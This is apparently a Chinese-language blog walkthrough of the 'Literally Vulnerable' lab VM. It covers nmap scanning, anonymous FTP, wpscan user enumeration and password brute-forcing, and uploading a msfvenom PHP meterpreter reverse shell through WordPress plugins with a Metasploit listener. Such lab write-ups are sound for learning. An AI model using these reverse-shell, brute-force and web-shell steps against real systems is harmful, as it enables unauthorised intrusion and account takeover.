Literally Vulnerable实验


在vm中启动试验机

探测IP地址

首先执行本机ifconfig查看vm网卡地址

使用nmap探测存活主机

从中发现192.168.146.128为实验主机。

探测端口信息

使用nmap扫描实验主机端口开放信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
nmap -p- -A 192.168.146.128
Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-15 01:25 CST
Nmap scan report for literally.vulnerable (192.168.146.128)
Host is up (0.00059s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 ftp ftp 325 Dec 04 13:05 backupPasswords
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.146.129
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 2f:26:5b:e6:ae:9a:c0:26:76:26:24:00:a7:37:e6:c1 (RSA)
| 256 79:c0:12:33:d6:6d:9a:bd:1f:11:aa:1c:39:1e:b8:95 (ECDSA)
|_ 256 83:27:d3:79:d0:8b:6a:2a:23:57:5b:3c:d7:b4:e5:60 (ED25519)
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-generator: WordPress 5.3
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Not so Vulnerable – Just another WordPress site
|_http-trane-info: Problem with XML parsing of /evox/about
65535/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
MAC Address: 00:0C:29:01:26:7B (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.58 ms literally.vulnerable (192.168.146.128)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.60 seconds

从nmap的扫描信息得出 21端口存在anonymous访问

到此,21端口结束。

打开80端口,访问主页发现使用了WordPress

这里没发现东西,接着尝试65535端口

经过跑目录发现了phpcms这个目录(这里我的字典没跑出来,看来还是太垃圾了)同样使用wpscan跑下用户名

1
2
3
4
5
6
7
8
9
10
11
wpscan --url http://192.168.146.128:65535/phpcms/ --enumerate u
......
[+] notadmin
| Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] maybeadmin
| Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)

发现存在两个用户名notadmin和maybeadmin,这里通过上面21端口中的密码本,对密码进行爆破得到maybeadmin的密码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
wpscan --url http://192.168.146.128:65535/phpcms/ -e u -P pass_wp.txt
[+] maybeadmin
| Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] notadmin
| Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] Performing password attack on Xmlrpc against 2 user/s
[SUCCESS] - maybeadmin / $EPid%J2L9LufO5
Trying notadmin / SCb$I^gDDqE34fA Time: 00:00:00 <=================================================================================================================================================================================================> (19 / 19) 100.00% Time: 00:00:00
[i] Valid Combinations Found:
| Username: maybeadmin, Password: $EPid%J2L9LufO5

上传shell

登录系统,发现一篇文章中有notadmin的密码 Pa$$w0rd13!&,登入notadmin账号发现为wp管理员账号

上传shell,这里我使用了msf的shell

1
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.146.131 LPORT=1234 -f raw >shell.php

通过wp的插件处上传shell

上传成功保存在/phpcms/wp-content/uploads/2019/12/shell.php

现在开始配置msf监听

1
2
3
4
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.146.131
set lport 1234

拿到shell

后边提权的我再学学,太菜了。。。。。。

文章目录
  1. 1. 探测IP地址
  2. 2. 探测端口信息
  3. 3. 上传shell
|